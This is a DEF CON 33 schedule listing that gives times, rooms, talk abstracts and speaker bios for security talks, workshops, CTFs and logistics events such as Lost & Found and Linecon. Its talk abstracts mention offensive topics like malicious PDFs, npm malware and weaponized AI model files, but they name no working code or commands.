Where: LVCCWest-Level1-Hall1-W103 - Map

Description:

On Saturday, we have a timed competition from 10:30a-5:30pm on a new scenario. Each team/individual is given Kubernetes API access to a team-specific cluster for each flag. The team can capture flags and win points as they progress. A scoreboard tracks the teams’ current and final scores. In the event of a tie, the first team to achieve the score wins that tie. This is open to only 30 teams and only from Saturday 10:30am - 5:30pm Pacific.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Friday - 12:00-16:59 PDT


Title: Kubernetes Learning CTF (Non-competitive) w/ Support
When: Friday, Aug 8, 12:00 - 16:59 PDT
Where: LVCCWest-Level1-Hall1-W103 - Map

Description:

On Friday through Sunday, we have a non-competitive learning run, where you can go through the Kubernetes CTF scenario from a previous year. It has an available "cheat sheet" that shows you how to run through, start to finish! You can do this without the "cheat sheet" if you want a puzzle.

Each team/individual gets a Kubernetes cluster that contains a set of flags.

This is open to up to 30 teams and is available from Friday 12pm to Sunday 12pm Pacific.

We will support DEF CON players in the contest area during the following times: - Friday: 12:00-17:00 - Saturday: 10:00-17:00 - Sunday: 10:00-12:00


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 10:00-16:59 PDT


Title: Kubernetes Learning CTF (Non-competitive) w/ Support
When: Saturday, Aug 9, 10:00 - 16:59 PDT
Where: LVCCWest-Level1-Hall1-W103 - Map

Description:

On Friday through Sunday, we have a non-competitive learning run, where you can go through the Kubernetes CTF scenario from a previous year. It has an available "cheat sheet" that shows you how to run through, start to finish! You can do this without the "cheat sheet" if you want a puzzle.

Each team/individual gets a Kubernetes cluster that contains a set of flags.

This is open to up to 30 teams and is available from Friday 12pm to Sunday 12pm Pacific.

We will support DEF CON players in the contest area during the following times: - Friday: 12:00-17:00 - Saturday: 10:00-17:00 - Sunday: 10:00-12:00


Return to Index    -    Add to Google    -    ics Calendar file

CON - Sunday - 10:00-11:59 PDT


Title: Kubernetes Learning CTF (Non-competitive) w/ Support
When: Sunday, Aug 10, 10:00 - 11:59 PDT
Where: LVCCWest-Level1-Hall1-W103 - Map

Description:

On Friday through Sunday, we have a non-competitive learning run, where you can go through the Kubernetes CTF scenario from a previous year. It has an available "cheat sheet" that shows you how to run through, start to finish! You can do this without the "cheat sheet" if you want a puzzle.

Each team/individual gets a Kubernetes cluster that contains a set of flags.

This is open to up to 30 teams and is available from Friday 12pm to Sunday 12pm Pacific.

We will support DEF CON players in the contest area during the following times: - Friday: 12:00-17:00 - Saturday: 10:00-17:00 - Sunday: 10:00-12:00


Return to Index    -    Add to Google    -    ics Calendar file

DDV - Sunday - 10:00-10:59 PDT


Title: Last chance to pick up drives at the DDV
When: Sunday, Aug 10, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W225 - Map

Description:

This is your last chance to pickup your drives whether they're finished or not. Get here between 10:00am and 11:00am on Sunday as any drives left behind are considered donations.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Friday - 18:00-20:59 PDT


Title: Lawyers Meet
When: Friday, Aug 8, 18:00 - 20:59 PDT
Where: LVCCWest-Level2-W209 - Map

Description:

If you're a lawyer (recently unfrozen or otherwise), a judge or a law student please make a note to join Jeff McNamara for a friendly get-together, drinks, and conversation.


Return to Index    -    Add to Google    -    ics Calendar file

DCW - Saturday - 14:00-17:59 PDT


Title: Learning to Hack Bluetooth Low Energy with BLE CTF
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCNorth-Level2-N252 - Map

Description:

BLE CTF is a series of Bluetooth Low Energy challenges in a capture-the-flag format. It was created to teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user.

Over the past few years, BLE CTF has expanded to support multiple platforms and skill levels. Various books, workshops, training, and conferences have utilized it as an educational platform and CTF. As an open source, low-cost of entry, and expandable education solution, BLE CTF has helped progress Bluetooth security research.

This workshop will teach the fundamentals of interacting with and hacking Bluetooth Low Energy services. Each exercise, or flag, aims to interactively introduce a new concept to the user. For this workshop, we will undergo a series of exercises to teach beginner students new concepts and allow more seasoned users to try new tools and techniques. After completing this workshop, you should have a good solid understanding of how to interact with and hack on BLE devices in the wild.

Speakers:Ryan Holeman,Alek Amrani

SpeakerBio:  Ryan Holeman

Ryan Holeman resides in Austin, Texas, where he works as the CISO for Stability AI. He is currently pursuing a Ph.D. in cyber defense from Dakota State University. He has spoken at respected venues such as Black Hat, DEF CON, Lockdown, BSides, Ruxcon, Notacon, and Shmoocon. You can keep up with his current activity, open source contributions, and general news on his blog. His spare time is mostly spent digging into various network protocols, random hacking, creating art, and shredding local skateparks.

SpeakerBio:  Alek Amrani

Alek Amrani is bad at expense reports.


Return to Index    -    Add to Google    -    ics Calendar file

PLV - Sunday - 12:30-12:59 PDT


Title: Legalizing Ethical Hacking: A Global Safe Harbor for Security Research
When: Sunday, Aug 10, 12:30 - 12:59 PDT
Where: LVCCWest-Level2-W232 - Map

Description:
SpeakerBio:  Miracle "OWOLABI" Abiodun
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

CRE - Sunday - 10:00-11:50 PDT


Title: Let's Break Enigma!
When: Sunday, Aug 10, 10:00 - 11:50 PDT
Where: LVCCWest-Level1-Hall4-Communities-C101 - Map

Description:

Enigma was the infamous German encryption machines that was used in World War 2. A group of British cryptographers successfully broke the sophisticated machine, and in doing so, gave rise to modern adversarial cryptography and the Turing Machine, which would later evolve into the computer. In this workshop, we will look at how adversarial cryptography initially formed and how many of the techniques used still apply today. Additionally, many of the mathematical principles used in both the construction of the Enigma machine and its subsequent breaking are used heavily in modern encryption, which directly relate to the technology used in cryptocurrency.

Speakers:Rigo Salazar,Luke Szramowski

SpeakerBio:  Rigo Salazar

Rigo Salazar is a Gen Z who is a Millennial in spirit with a Master’s degree in Mathematics and a Bachelor’s in Civil Engineering… for some reason. Jigsaw puzzles, puppetry, and platforming are a handful of his hobbies, but his true loves are his family, friends, and prime numbers. With boisterous whimsy and the volume to match, Rigo is so excited for his second Defcon and the opportunity to talk about cryptography.

SpeakerBio:  Luke Szramowski

Luke Szramowski is a mathematical researcher, with a Bachelor's Degree in Mathematics and two Master's Degrees, one in Math, with a focus in Number Theory and another in Math with a focus in Coding Theory. In his free time, Luke works on a litany of different math problems, mainly regarding Number Theoretic conjectures and playing all different types of games. He is very excited to talk about any cryptography related questions and is looking forward to his first DEF CON.


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Sunday - 12:00-12:30 PDT


Title: Letthemin: Facilitating High-Value Purple Teams Using an Assumed Compromise Approach
When: Sunday, Aug 10, 12:00 - 12:30 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Purple Teaming has become a critical component of modern cybersecurity programs, but its definition and application vary widely across organizations. This presentation introduces a refined, regimented, and repeatable methodology for running Purple Team engagements, developed and battle-tested for over a decade. As the term 'Purple Team' means different things to different people— a methodology, a team of people, a program, an assessment, or even a state of mind—and as Purple Team engagements themselves come in all shapes and sizes, the speaker will begin by aligning recommended definitions and applications of common Purple Team terminology. The presentation will explain how to apply an Assumed Compromise approach to Purple Teams. Any organization can be vulnerable at any point in time. This style of Purple Team testing follows the adversary through the entire life cycle of an attack, from Initial Access to Impact, assuming vulnerabilities exist to instead focus on the visibility of security tools. This is a powerful method of identifying ways to improve detection and prevention capabilities at each layer of an organization’s defense in depth. The speaker will include real world examples and specific instructions. The presentation will conclude with broader applications of this style of Purple Team. This will include how to collect and analyze the engagement results and apply these results to drive improvement to an organization’s resilience to common threats. This talk is ideal for security professionals, both Red and Blue Team, who are looking to elevate the way they perform Purple Team engagements.

SpeakerBio:  Sarah Hume, Purple Team Service Lead at Security Risk Advisors

Sarah leads the Purple Team service at Security Risk Advisors (SRA). She has led hundreds of Threat Intelligence-based Purple Team exercises for organizations in the Fortune 500 and Global 1000 over the past 7 years. Her background is in offensive security, primarily internal network, OT/ICS, and physical security penetration testing. Sarah also has experience in external network penetration testing, web application assessments, OSINT, phishing/vishing campaigns, vulnerability management, and cloud assessments. Sarah graduated Summa Cum Laude from Penn State with a B.S. in Cybersecurity. She is a Certified Red Team Operator (CRTO), Certified Information Systems Security Professional (CISSP), Google Digital Cloud Leader, AWS Certified Cloud Practitioner, and Advanced Infrastructure Hacking Certified. She lives in Philadelphia with her dog, Paxton.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 15:00-15:50 PDT


Title: Level UP OSINT
When: Saturday, Aug 9, 15:00 - 15:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 4 - Map

Description:

Dive into the dynamic world of Open Source Intelligence (OSINT) with this quick workshop designed to give you a taste of practical online investigations and threat hunting. Led by a seasoned professional, this immersive session offers a condensed yet impactful introduction to essential OSINT techniques that you can use in your red teaming engagements.

Experience the power of hands-on learning as you engage in live demonstrations, exploring key concepts such as operational security (OpSec), advanced search engine queries, username and phone number lookups, social media reconnaissance, breached records analysis, network reconnaissance, historical records, and essential documentation, all within the span of this engaging workshop. Through interactive exercises and guided discussions, participants will gain a glimpse into the world of OSINT.

Who’s it for?

This training is suited for all individuals in any field with a keen interest in online investigations regardless of their experience level in OSINT

SpeakerBio:  Mishaal Khan

Mishaal is a subject matter expert in cybersecurity, pentesting, privacy, Open Source Intelligence and social engineering and a frequent speaker on these topics at Universities and popular cybersecurity conferences like DEF CON, Black Hat, Wild West Hackin Fest, TEDx, and multiple BSides Security events.

Mishaal has worked with multinational companies for over 20 years, securing their networks and providing executive level consultancy as a CISO to manage risk and avoid breaches. He's the author of the book; The Phantom CISO, runs a cybersecurity practice as a vCISO and owns a privacy management and investigations firm.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Friday - 14:00-14:50 PDT


Title: Leveraging AI and MCP Servers for Automated External Attack Surface Testing
When: Friday, Aug 8, 14:00 - 14:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

This talk dives into how Artificial Intelligence (AI) combined with Model Context Protocol (MCP) can revolutionize external attack surface testing. Attendees will learn repeatable, low-effort techniques to identify exposed assets, prioritize risks, and automate vulnerability discovery using AI-driven insights.

SpeakerBio:  Shane Krause

Shane Krause is a 25-year-old cybersecurity professional who broke into offensive security two years ago, fueled by a lifelong passion for technology and problem-solving. As a penetration tester, Shane Krause enjoys identifying vulnerabilities, simulating real-world attacks, and helping organizations strengthen their defenses. Outside of work, Shane Krause is an avid gamer who values connecting with others in the cybersecurity community and sharing knowledge to grow together in the field.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 12:00-12:45 PDT


Title: Lex Sleuther
When: Saturday, Aug 9, 12:00 - 12:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

Lex Sleuther is an internal tool developed at CrowdStrike for detecting the script language of an unknown text file based purely on its contents. We derive a novel approach using lexer generators and ridge regression and develop the solution as a compact Rust binary with Python bindings. We compare our solution to the current state of the art and present CrowdStrike’s own findings of relative efficacy in the field. Lex Sleuther has been recently open sourced for everybody to use.

SpeakerBio:  Aaron "KNOX" James

Aaron has been the tooling guy for over 13 years, when he first wrote hacks for his favorite games. He still writes hacking tools, but now for security companies.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 13:00-13:45 PDT


Title: Lex Sleuther
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W210 - Map

Description:

Lex Sleuther is an internal tool developed at CrowdStrike for detecting the script language of an unknown text file based purely on its contents. We derive a novel approach using lexer generators and ridge regression and develop the solution as a compact Rust binary with Python bindings. We compare our solution to the current state of the art and present CrowdStrike’s own findings of relative efficacy in the field. Lex Sleuther has been recently open sourced for everybody to use.

SpeakerBio:  Aaron "KNOX" James

Aaron has been the tooling guy for over 13 years, when he first wrote hacks for his favorite games. He still writes hacking tools, but now for security companies.


Return to Index    -    Add to Google    -    ics Calendar file

- Saturday - 10:00-11:59 PDT


Title: LHC Capture the Flag
When: Saturday, Aug 9, 10:00 - 11:59 PDT
Where: LVCCWest-Level2-W201-W202 - Map

Description:

Capture the flag for beginners to advanced.


Return to Index    -    Add to Google    -    ics Calendar file

- Friday - 10:00-11:59 PDT


Title: LHC Capture the Flag
When: Friday, Aug 8, 10:00 - 11:59 PDT
Where: LVCCWest-Level2-W201-W202 - Map

Description:

Capture the flag for beginners to advanced.


Return to Index    -    Add to Google    -    ics Calendar file

- Friday - 10:00-10:59 PDT


Title: LHC First Time DEF CON Meetup
When: Friday, Aug 8, 10:00 - 10:59 PDT
Where: LVCCWest-Level2-W201-W202 - Map

Description:

First time attending DEF CON? If so stop by for our meet up to meet like minded people who are also coming for the first time by themselves or with friends to meet people to attend talks, villages, workshops, etc with!


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Wednesday - 17:00-07:59 PDT


Title: Linecon
When: Wednesday, Aug 6, 17:00 - 07:59 PDT
Where: LVCCWest - Map

Description:

Linecon is your optional opportunity to stand (or sit) in line for human registration to open. Doors will open for linecon on Wednesday at approximately 17:00. When human registration opens on Thursday at approximately 08:00, they start working the linecon queue, and the line will start moving quickly. (Please understand that we will begin processing the line on Thursday morning as soon as the cashiers and materials are in place; we will strive for Thursday 08:00, but actual start may be slightly earlier or later.)

Online badge purchase (aka pre-registration) has no impact on linecon. You can join the line on Wednesday (if you wish) regardless of whether you purchased a badge online or intend to pay with cash. There is only one linecon for both types of badge sales.

Please help us make this a great experience for everyone by following directions given by goons. After human registration opens, there may be one line for all of registration, or there may be two lines (one for online sales (pre-registration) and one for cash sales). This may also change over time, based on available staffing and necessary crowd control. We will strive to make it easily understandable in-person as to which line you should join.

Please also review the "Human Registration Open" event, and familiarize yourself with the important notes therein.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Sunday - 14:00-14:20 PDT


Title: Loading Models, Launching Shells: Abusing AI File Formats for Code Execution
When: Sunday, Aug 10, 14:00 - 14:20 PDT
Where: LVCCWest-Level1-Hall3-Track 3 - Map

Description:

Everyone knows not to trust pickle files, but what about .onnx, .h5, or .npz? This talk explores how trusted file formats used in AI and large language model workflows can be weaponized to deliver reverse shells and stealth payloads. These attacks rely solely on the default behavior of widely used machine learning libraries and do not require exploits or unsafe configuration.

The presentation focuses on formats that are not typically seen as dangerous: ONNX, HDF5, Feather, YAML, JSON, and NPZ. These formats are commonly used across model sharing, training pipelines, and inference systems, and are automatically loaded by tools such as onnx, h5py, pyarrow, and numpy. A live demo will show a healthcare chatbot executing code silently when these formats are deserialized, with no user interaction and no alerts. This is a demonstration of how trusted data containers can become malware carriers in AI systems. Attendees will leave with a clear understanding of the risks introduced by modern ML workflows, and practical techniques for payload delivery, threat detection, and hardening against this type of tradecraft.

References:

SpeakerBio:  Cyrus Parzian

Cyrus Parzian is an AI Red Team Lead with over a decade of experience in offensive security, red teaming, and AI risk testing. He has led AI red team assessments targeting model serialization abuse, data leakage prevention, prompt injection, and LLM jailbreak resistance. Cyrus has created standardized reporting frameworks, built payload testing infrastructure, and designed internal training focused on exploitation of AI-powered systems. He has conducted over 100 offensive operations across internal networks, cloud environments, and LLM-integrated applications. His work includes large-scale phishing campaigns, persistent C2 infrastructure, and exploitation of automation platforms like Power Automate. Cyrus shares his research on iRedTeam.ai, where he focuses on weaponizing trusted model formats and exposing blind spots in AI-driven systems. He has spoken at ArcticCon and served as organizer of Fiestacon.


Return to Index    -    Add to Google    -    ics Calendar file

ICSV - Friday - 15:30-15:59 PDT


Title: Locked Down, Not Locked Out: How I Escaped Your Secure Operator Workstation
When: Friday, Aug 8, 15:30 - 15:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Organizations across industries rely on "locked down" operator workstations to protect critical systems, but how secure are they really? As a penetration tester, I’ve put these defenses to the test across multiple verticals, using only the tools and permissions available to a standard operator account and on that local machine. Time and time again, despite variations in vendor solutions and industry-specific constraints, I found common weaknesses that allowed me to break out, escalate privileges, and compromise the system—often without triggering alerts.

This talk dives into the recurring security flaws that make these workstations vulnerable, from misconfigurations and weak application controls to a commonly overlooked "living off the land" technique. I’ll walk through real-world breakout scenarios, demonstrating how attackers exploit these weaknesses. But it’s not just about breaking out—I'll also cover practical, vendor-agnostic defenses to harden operator workstations against these attacks. Whether you’re a defender, engineer, or just curious, you’ll leave with a better understanding of the risks and how to make the attackers job that much harder.

SpeakerBio:  Aaron Boyd

Aaron Boyd is an experienced OT Cybersecurity Generalist with over 10 years experience in conducting penetration testing, vulnerability assessments, and threat hunting within complex OT/ICS infrastructures and applications in many different verticals. He is passionate about ensuring robust protection for critical infrastructure and firmly believes in focusing on real security improvements rather than just checking compliance boxes.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Friday - 10:00-01:59 PDT


Title: Lost & Found
When: Friday, Aug 8, 10:00 - 01:59 PDT
Where: LVCCWest - Map

Description:

If you find something that seems to have been lost, please take that item to the nearest NFO Node. The item will enter the DEF CON Lost & Found system.

If you've lost something, the only way to check on it (or reclaim it) is by going to the Lost & Found department yourself. The Lost & Found department is in room LVCC - L2 - W238. You may also call Lost & Found at +1 (702) 477-5019.

The Lost & Found department plans to be open Thursday - Saturday, during all hours that the conference operates. On Sunday, the Lost & Found department will open with the venue at 08:00, but will close at the beginning of DEF CON 33 Closing Ceremonies (15:00). Shortly thereafter, all remaining lost items will be transferred to the LVCC. If you need to reach LVCC's Lost & Found, you may call LVCC Dispatch at +1 (702) 892-7400.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Saturday - 10:00-01:59 PDT


Title: Lost & Found
When: Saturday, Aug 9, 10:00 - 01:59 PDT
Where: LVCCWest - Map

Description:

If you find something that seems to have been lost, please take that item to the nearest NFO Node. The item will enter the DEF CON Lost & Found system.

If you've lost something, the only way to check on it (or reclaim it) is by going to the Lost & Found department yourself. The Lost & Found department is in room LVCC - L2 - W238. You may also call Lost & Found at +1 (702) 477-5019.

The Lost & Found department plans to be open Thursday - Saturday, during all hours that the conference operates. On Sunday, the Lost & Found department will open with the venue at 08:00, but will close at the beginning of DEF CON 33 Closing Ceremonies (15:00). Shortly thereafter, all remaining lost items will be transferred to the LVCC. If you need to reach LVCC's Lost & Found, you may call LVCC Dispatch at +1 (702) 892-7400.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Sunday - 10:00-13:59 PDT


Title: Lost & Found
When: Sunday, Aug 10, 10:00 - 13:59 PDT
Where: LVCCWest - Map

Description:

If you find something that seems to have been lost, please take that item to the nearest NFO Node. The item will enter the DEF CON Lost & Found system.

If you've lost something, the only way to check on it (or reclaim it) is by going to the Lost & Found department yourself. The Lost & Found department is in room LVCC - L2 - W238. You may also call Lost & Found at +1 (702) 477-5019.

The Lost & Found department plans to be open Thursday - Saturday, during all hours that the conference operates. On Sunday, the Lost & Found department will open with the venue at 08:00, but will close at the beginning of DEF CON 33 Closing Ceremonies (15:00). Shortly thereafter, all remaining lost items will be transferred to the LVCC. If you need to reach LVCC's Lost & Found, you may call LVCC Dispatch at +1 (702) 892-7400.


Return to Index    -    Add to Google    -    ics Calendar file

MISC - Thursday - 09:00-18:59 PDT


Title: Lost & Found
When: Thursday, Aug 7, 09:00 - 18:59 PDT
Where: LVCCWest - Map

Description:

If you find something that seems to have been lost, please take that item to the nearest NFO Node. The item will enter the DEF CON Lost & Found system.

If you've lost something, the only way to check on it (or reclaim it) is by going to the Lost & Found department yourself. The Lost & Found department is in room LVCC - L2 - W238. You may also call Lost & Found at +1 (702) 477-5019.

The Lost & Found department plans to be open Thursday - Saturday, during all hours that the conference operates. On Sunday, the Lost & Found department will open with the venue at 08:00, but will close at the beginning of DEF CON 33 Closing Ceremonies (15:00). Shortly thereafter, all remaining lost items will be transferred to the LVCC. If you need to reach LVCC's Lost & Found, you may call LVCC Dispatch at +1 (702) 892-7400.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Monday - 08:00-16:59 PDT


Title: Loudmouth Security - Offensive IoT Exploitation
When: Monday, Aug 11, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

As IoT becomes more integrated and integral into personal and work lives, there is a growing need to understand the inner workings of IoT devices and ensure these devices are secure. This course teaches security professionals and hackers how to identify and exploit security vulnerabilities in IoT devices. Participants will learn to interact with hardware debug capabilities, communicate with memory devices, and virtualize and analyze firmware. The course also covers various hardware attacks including glitching and side channel attacks, as well as diving into communications protocols, including Bluetooth, Zigbee, Thread and Matter. Participants will gain hands-on experience with industry tools and techniques. This course is suitable for security professionals, penetration testers, and hackers with basic programming and computer system knowledge, and equips them with skills to discover new vulnerabilities in IoT devices.

SpeakerBio:  Loudmouth Security, Loudmouth Security

The Loudmouth Security team consists of renowned security consultants and researchers with extensive experience in the cybersecurity industry. Collectively, they bring decades of expertise, with team members holding prestigious Black Badges from the IoT CTF at DEF CON 26. Several team members have been regular contributors to IoT Village and are now founders of the new Embedded Systems Village, where they continue to push the boundaries of security research.

The team excels at explaining complicated technical findings to executive management teams and has spent years mentoring younger hackers entering the field. Their teaching abilities stem from a shared passion for cybersecurity and dedication to continuous learning. They constantly seek out new information and insights, which they incorporate into their courses to provide the most up-to-date and relevant training possible.

Loudmouth Security's experts bring diverse specializations to the table. The team includes accomplished PCB designers with extensive hardware knowledge, professionals with backgrounds in IT administration for industrial and manufacturing companies, and specialists in the virtualization of embedded devices. Key team members have performed research on some of the most unusual and advanced embedded systems, discovering and disclosing significant bugs in the process.

As highly skilled trainers, the Loudmouth team is always eager to share their collective knowledge and experience, helping organizations stay ahead of the latest cyber threats.


Return to Index    -    Add to Google    -    ics Calendar file

TRN - Tuesday - 08:00-16:59 PDT


Title: Loudmouth Security - Offensive IoT Exploitation
When: Tuesday, Aug 12, 08:00 - 16:59 PDT
Where: LVCCWest - Map

Description:

As IoT becomes more integrated and integral into personal and work lives, there is a growing need to understand the inner workings of IoT devices and ensure these devices are secure. This course teaches security professionals and hackers how to identify and exploit security vulnerabilities in IoT devices. Participants will learn to interact with hardware debug capabilities, communicate with memory devices, and virtualize and analyze firmware. The course also covers various hardware attacks including glitching and side channel attacks, as well as diving into communications protocols, including Bluetooth, Zigbee, Thread and Matter. Participants will gain hands-on experience with industry tools and techniques. This course is suitable for security professionals, penetration testers, and hackers with basic programming and computer system knowledge, and equips them with skills to discover new vulnerabilities in IoT devices.

SpeakerBio:  Loudmouth Security, Loudmouth Security

The Loudmouth Security team consists of renowned security consultants and researchers with extensive experience in the cybersecurity industry. Collectively, they bring decades of expertise, with team members holding prestigious Black Badges from the IoT CTF at DEF CON 26. Several team members have been regular contributors to IoT Village and are now founders of the new Embedded Systems Village, where they continue to push the boundaries of security research.

The team excels at explaining complicated technical findings to executive management teams and has spent years mentoring younger hackers entering the field. Their teaching abilities stem from a shared passion for cybersecurity and dedication to continuous learning. They constantly seek out new information and insights, which they incorporate into their courses to provide the most up-to-date and relevant training possible.

Loudmouth Security's experts bring diverse specializations to the table. The team includes accomplished PCB designers with extensive hardware knowledge, professionals with backgrounds in IT administration for industrial and manufacturing companies, and specialists in the virtualization of embedded devices. Key team members have performed research on some of the most unusual and advanced embedded systems, discovering and disclosing significant bugs in the process.

As highly skilled trainers, the Loudmouth team is always eager to share their collective knowledge and experience, helping organizations stay ahead of the latest cyber threats.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 14:00-17:59 PDT


Title: Mac Malware Analysis
When: Saturday, Aug 9, 14:00 - 17:59 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Patrick Wardle

Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of "The Art of Mac Malware" book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 11:00-11:59 PDT


Title: Magical Hacks
When: Saturday, Aug 9, 11:00 - 11:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

In his final boss form "Houdinti", @intidc delivers an interactive magic show in which every trick is an actual live hack. During this spectacle, we're hacking several locks, biometrics, passwords, PIN codes & more! The show is suited for both beginners and pro's, who'll get the opportunity to take a guess on how the tricks work prior to them being revealed. Live hacking demonstrations will never be the same again.

SpeakerBio:  Inti "intidc" De Ceukelaire, Chief Hacker Officer at Intigriti

Inti De Ceukelaire is a Belgian ethical hacker and cybercrime investigator. He currently works as the Chief Hacker Officer at Europe's largest vulnerability disclosure platform Intigriti, a founding member of the Hacker Policy Council. In 2018, Inti won the "Most Valuable Hacker" award at the largest live hacking event in Las Vegas.

With extensive experience in the field of security and ethical hacking, Inti has earned a reputation as a thought leader in the industry. His work and expertise have been featured in a variety of international publications, including the BBC, Wired, The Verge, CNET, Mashable, and New York Magazine. Inti has made global headlines through his security awareness pranks, which have included manipulating the Vatican's website, creating fake news on Donald Trump's Twitter account, and hacking Metallica. Through these high-profile stunts, Inti has drawn attention to the importance of cybersecurity and the need for individuals and organisations to be vigilant about potential threats. As an experienced and engaging speaker, Inti is able to make complex topics accessible to a wide audience. He has spoken at a variety of conferences and events, sharing insights on the latest trends in cybersecurity and offering practical tips to help individuals and organisations protect themselves from potential threats.

He is also a trusted source for media outlets seeking expert commentary on topics related to cybersecurity, hacking and technology.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 10:00-10:30 PDT


Title: Making Dirty Pictures - The Issue with DICOM
When: Saturday, Aug 9, 10:00 - 10:30 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Michael "v3ga" Aguilar, Principal Consultant at Sophos Red Team

Michael Aguilar (v3ga) is a Principal Consultant for Sophos Red Team. He leads efforts in Medical Device testing, Adversarial Simulations, Physical Security assessments, Network testing and more. Currently, he has 8 CVE vulnerabilities aligned with security issues located during testing at DEF CON's Biohacking Village Device Lab. He has also led the winning team of the DEF CON Biohacking Village CTF for two consecutive years.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 10:00-12:59 PDT


Title: Malware and Monsters
When: Saturday, Aug 9, 10:00 - 12:59 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Klaus Agnoletti
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 11:00-11:50 PDT


Title: Malware Exploitation in PDFs: A Red Team Perspective
When: Saturday, Aug 9, 11:00 - 11:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:

Join us for an in-depth exploration of how PDFs, a ubiquitous document format, can be exploited as a vessel for executing malicious JavaScript malware. This presentation will delve into real-world vulnerability that have been targeted to execute harmful code within PDF files—posing a serious threat in today's cybersecurity landscape.

Key exploit techniques we'll explore include:

Heap Spray Attacks: Using shellcode to strategically overwrite memory, thereby enabling attackers to execute arbitrary code and gain control over target systems.

Data Exfiltration Tactics: Methods for covertly extracting critical information, such as email addresses and system details, from users without their knowledge or consent. Embedding Malware in PDFs: An examination of how attackers embed harmful scripts into PDFs, tricking users into activating exploits within Adobe Reader through seemingly ordinary actions.

We'll dissect malicious actions such as shellcode injection, buffer overflow attacks, Adobe Reader exploit, and memory manipulation, all designed to execute malware effectively.

This session is perfect for offensive security professionals seeking to deepen their understanding of PDF-based exploits and enhance their penetration testing and threat emulation capabilities. Discover how these sophisticated threats operate and learn strategies to counteract them within your security frameworks. Join us to stay ahead in the ever-evolving world of cyber threats.

More information about the presentation you can find in this article - https://labs.senhasegura.blog/unmasking-the-threat-a-deep-dive-into-the-pdf-malicious-2/

SpeakerBio:  Filipi Pires

I’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura, Founder at Black&White Technology, Cybersecurity Advocate, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. International Speaker at Security and New technologies events in many countries such as US, Canada, France, Spain, Germany, Poland, and others, I’ve served as University Professor in Graduation and MBA courses at Brazilian colleges, in addition, I'm Creator and Instructor of the Course - Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers(PentestMagazine) and Malware Analysis - Fundamentals (HackerSec).


Return to Index    -    Add to Google    -    ics Calendar file

ADV - Saturday - 11:00-11:30 PDT


Title: Malware in the gist: How malicious packages on npm bypass existing security tools
When: Saturday, Aug 9, 11:00 - 11:30 PDT
Where: LVCCWest-Level2-W228 - Map

Description:

npm is owned by Microsoft and is the world’s largest software registry. It hosts nearly 5 million packages and 4.5 trillion requests for packages were made to npm in 2024. The open and accessible nature of npm is one of its main features, but its also one of the reasons that threat actors are attracted to it. A recent study by Sonatype found that 98.5% of malicious software packages are hosted and delivered via npm.

This technical deep-dive will explain why npm is so good at delivering malware; expose how threat actors are using npm; and why existing security tools like SCA, SAST, EDR and anti-virus solutions will not protect you from npm based malware.

Key Topics:

SpeakerBio:  Paul McCarty, Founder of SecureStack. DevSecOps evangelist,

Don't let Paul's baby face fool you, he has been working with engineering teams for 30 years. Paul's specialty is helping organizations build secure applications at scale. He's done that for large organizations like NASA, John Deere, Blue Cross/Blue Shield, US Army, and the Australian government. He's also built or worked for several startups along the way helping them do the same thing. Paul spent most of his career in Utah but now lives in Australia with his wife and 3 kids.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 10:40-11:10 PDT


Title: Malware Matryoshka: Nested Obfuscation Techniques
When: Friday, Aug 8, 10:40 - 11:10 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Brian Baskin
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 11:00-11:45 PDT


Title: Man-in-the-Malware: Intercepting Adversarial Communications
When: Saturday, Aug 9, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

